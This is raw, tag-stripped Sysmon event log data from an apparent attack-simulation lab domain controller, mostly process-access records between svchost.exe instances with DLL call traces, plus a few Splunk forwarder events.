AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\AppReadiness\S-1-5-21-4055678433-3894535204-3898404691-500MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005463Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.301{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27B8D756D42453AB6107C3366E4E643E,SHA256=2D09F745B718B7BF382864FC80F0B3DDBCA5DFFC844C7B767F5F18F819F87BCC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005462Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.270{266CAFBE-64C6-6064-A900-00000000AE01}34042980C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000005461Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.255{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005460Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.255{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000005459Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.255{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005458Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.255{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000005457Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.255{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005456Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.255{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005455Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.255{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005454Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.255{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005453Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.255{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005452Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.255{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005451Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.255{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005450Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.255{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005449Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.255{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005448Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.255{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005447Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.255{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005446Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.255{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005445Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.255{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005444Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.255{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005443Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.255{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005442Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.255{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005441Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.239{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005440Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.239{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005439Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
